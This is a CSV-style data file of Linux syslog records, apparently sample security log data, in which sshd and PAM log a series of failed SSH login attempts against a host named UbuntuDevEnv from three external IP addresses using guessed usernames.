+5132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:30,UbuntuDevEnv,2019-06-26 15:11:30,auth,UbuntuDevEnv,info,Disconnected from invalid user egarcia 47.254.147.170 port 54858 [preauth],18528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,egarcia,47.254.147.1,54858,,
+5133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:11:30,UbuntuDevEnv,2019-06-26 15:11:30,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 54858:11: Bye Bye [preauth],18528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,54858,,
+5134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:34,UbuntuDevEnv,2019-06-26 15:12:34,auth,UbuntuDevEnv,info,Invalid user etherpad-lite from 192.241.213.168 port 50208,18749,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etherpad,192.241.213.1,50208,,
+5135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:34,UbuntuDevEnv,2019-06-26 15:12:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18749,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:34,UbuntuDevEnv,2019-06-26 15:12:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,18749,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:36,UbuntuDevEnv,2019-06-26 15:12:35,auth,UbuntuDevEnv,info,Failed password for invalid user etherpad-lite from 192.241.213.168 port 50208 ssh2,18749,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etherpad,192.241.213.1,50208,,
+5138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:36,UbuntuDevEnv,2019-06-26 15:12:35,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 50208:11: Bye Bye [preauth],18749,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,50208,,
+5139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:36,UbuntuDevEnv,2019-06-26 15:12:35,auth,UbuntuDevEnv,info,Disconnected from invalid user etherpad-lite 192.241.213.168 port 50208 [preauth],18749,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etherpad,192.241.213.1,50208,,
+5140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:48,UbuntuDevEnv,2019-06-26 15:12:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219  user=root,18808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,164.132.192.2,,0,
+5141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:51,UbuntuDevEnv,2019-06-26 15:12:50,auth,UbuntuDevEnv,info,Failed password for root from 164.132.192.219 port 60292 ssh2,18808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,60292,,
+5142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:51,UbuntuDevEnv,2019-06-26 15:12:50,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 60292:11: Bye Bye [preauth],18808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,60292,,
+5143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:51,UbuntuDevEnv,2019-06-26 15:12:50,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 164.132.192.219 port 60292 [preauth],18808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,164.132.192.2,60292,,
+5144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:59,UbuntuDevEnv,2019-06-26 15:12:58,auth,UbuntuDevEnv,info,Invalid user mitchell from 47.254.147.170 port 43916,18848,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mitchell,47.254.147.1,43916,,
+5145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:59,UbuntuDevEnv,2019-06-26 15:12:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18848,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:12:59,UbuntuDevEnv,2019-06-26 15:12:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,18848,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+5147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:13:01,UbuntuDevEnv,2019-06-26 15:13:01,auth,UbuntuDevEnv,info,Failed password for invalid user mitchell from 47.254.147.170 port 43916 ssh2,18848,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mitchell,47.254.147.1,43916,,
+5148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:13:01,UbuntuDevEnv,2019-06-26 15:13:01,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 43916:11: Bye Bye [preauth],18848,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,43916,,
+5149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:13:01,UbuntuDevEnv,2019-06-26 15:13:01,auth,UbuntuDevEnv,info,Disconnected from invalid user mitchell 47.254.147.170 port 43916 [preauth],18848,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mitchell,47.254.147.1,43916,,
+5150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:20,UbuntuDevEnv,2019-06-26 15:14:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219  user=test,19138,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,164.132.192.2,,0,
+5151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:23,UbuntuDevEnv,2019-06-26 15:14:23,auth,UbuntuDevEnv,info,Failed password for test from 164.132.192.219 port 40619 ssh2,19138,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,40619,,
+5152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:23,UbuntuDevEnv,2019-06-26 15:14:23,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 40619:11: Bye Bye [preauth],19138,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,40619,,
+5153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:23,UbuntuDevEnv,2019-06-26 15:14:23,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 164.132.192.219 port 40619 [preauth],19138,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,164.132.192.2,40619,,
+5154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:27,UbuntuDevEnv,2019-06-26 15:14:26,auth,UbuntuDevEnv,info,Invalid user alan from 47.254.147.170 port 33000,19168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alan,47.254.147.1,33000,,
+5155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:27,UbuntuDevEnv,2019-06-26 15:14:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,19168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:27,UbuntuDevEnv,2019-06-26 15:14:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,19168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+5157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:28,UbuntuDevEnv,2019-06-26 15:14:28,auth,UbuntuDevEnv,info,Failed password for invalid user alan from 47.254.147.170 port 33000 ssh2,19168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alan,47.254.147.1,33000,,
+5158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:28,UbuntuDevEnv,2019-06-26 15:14:28,auth,UbuntuDevEnv,info,Disconnected from invalid user alan 47.254.147.170 port 33000 [preauth],19168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alan,47.254.147.1,33000,,
+5159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:28,UbuntuDevEnv,2019-06-26 15:14:28,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 33000:11: Bye Bye [preauth],19168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,33000,,
+5160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:31,UbuntuDevEnv,2019-06-26 15:14:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,19175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:31,UbuntuDevEnv,2019-06-26 15:14:31,auth,UbuntuDevEnv,info,Invalid user ev from 192.241.213.168 port 38698,19175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ev,192.241.213.1,38698,,
+5162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:31,UbuntuDevEnv,2019-06-26 15:14:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,19175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:34,UbuntuDevEnv,2019-06-26 15:14:33,auth,UbuntuDevEnv,info,Failed password for invalid user ev from 192.241.213.168 port 38698 ssh2,19175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ev,192.241.213.1,38698,,
+5164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:34,UbuntuDevEnv,2019-06-26 15:14:33,auth,UbuntuDevEnv,info,Disconnected from invalid user ev 192.241.213.168 port 38698 [preauth],19175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ev,192.241.213.1,38698,,
+5165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:14:34,UbuntuDevEnv,2019-06-26 15:14:33,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 38698:11: Bye Bye [preauth],19175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,38698,,
+5166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:48,UbuntuDevEnv,2019-06-26 15:15:47,auth,UbuntuDevEnv,info,Invalid user prashant from 164.132.192.219 port 49181,19541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prashant,164.132.192.2,49181,,
+5167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:48,UbuntuDevEnv,2019-06-26 15:15:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,19541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+5168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:48,UbuntuDevEnv,2019-06-26 15:15:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,19541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:49,UbuntuDevEnv,2019-06-26 15:15:49,auth,UbuntuDevEnv,info,Failed password for invalid user prashant from 164.132.192.219 port 49181 ssh2,19541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prashant,164.132.192.2,49181,,
+5170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:49,UbuntuDevEnv,2019-06-26 15:15:49,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 49181:11: Bye Bye [preauth],19541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,49181,,
+5171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:49,UbuntuDevEnv,2019-06-26 15:15:49,auth,UbuntuDevEnv,info,Disconnected from invalid user prashant 164.132.192.219 port 49181 [preauth],19541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prashant,164.132.192.2,49181,,
+5172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:53,UbuntuDevEnv,2019-06-26 15:15:52,auth,UbuntuDevEnv,info,Invalid user oracle from 47.254.147.170 port 50380,19561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,47.254.147.1,50380,,
+5173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:53,UbuntuDevEnv,2019-06-26 15:15:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,19561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+5174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:53,UbuntuDevEnv,2019-06-26 15:15:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,19561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:54,UbuntuDevEnv,2019-06-26 15:15:54,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 47.254.147.170 port 50380 ssh2,19561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,47.254.147.1,50380,,
+5176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:55,UbuntuDevEnv,2019-06-26 15:15:54,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 47.254.147.170 port 50380 [preauth],19561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,47.254.147.1,50380,,
+5177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:15:55,UbuntuDevEnv,2019-06-26 15:15:54,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 50380:11: Bye Bye [preauth],19561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,50380,,
+5178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:16:22,UbuntuDevEnv,2019-06-26 15:16:22,auth,UbuntuDevEnv,info,Invalid user fraise from 192.241.213.168 port 55418,19655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fraise,192.241.213.1,55418,,
+5179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:16:22,UbuntuDevEnv,2019-06-26 15:16:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,19655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:16:22,UbuntuDevEnv,2019-06-26 15:16:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,19655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:16:24,UbuntuDevEnv,2019-06-26 15:16:23,auth,UbuntuDevEnv,info,Failed password for invalid user fraise from 192.241.213.168 port 55418 ssh2,19655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fraise,192.241.213.1,55418,,
+5182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:16:24,UbuntuDevEnv,2019-06-26 15:16:23,auth,UbuntuDevEnv,info,Disconnected from invalid user fraise 192.241.213.168 port 55418 [preauth],19655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fraise,192.241.213.1,55418,,
+5183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:16:24,UbuntuDevEnv,2019-06-26 15:16:23,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 55418:11: Bye Bye [preauth],19655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,55418,,
+5184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:17:20,UbuntuDevEnv,2019-06-26 15:17:20,auth,UbuntuDevEnv,info,Invalid user avila from 47.254.147.170 port 39620,19874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avila,47.254.147.1,39620,,
+5185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:17:20,UbuntuDevEnv,2019-06-26 15:17:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,19874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:17:20,UbuntuDevEnv,2019-06-26 15:17:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,19874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+5187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:17:23,UbuntuDevEnv,2019-06-26 15:17:22,auth,UbuntuDevEnv,info,Failed password for invalid user avila from 47.254.147.170 port 39620 ssh2,19874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avila,47.254.147.1,39620,,
+5188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:17:23,UbuntuDevEnv,2019-06-26 15:17:22,auth,UbuntuDevEnv,info,Disconnected from invalid user avila 47.254.147.170 port 39620 [preauth],19874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avila,47.254.147.1,39620,,
+5189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:17:23,UbuntuDevEnv,2019-06-26 15:17:22,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 39620:11: Bye Bye [preauth],19874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,39620,,
+5190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:17,UbuntuDevEnv,2019-06-26 15:18:16,auth,UbuntuDevEnv,info,Invalid user nagios from 192.241.213.168 port 43906,20072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,192.241.213.1,43906,,
+5191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:17,UbuntuDevEnv,2019-06-26 15:18:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
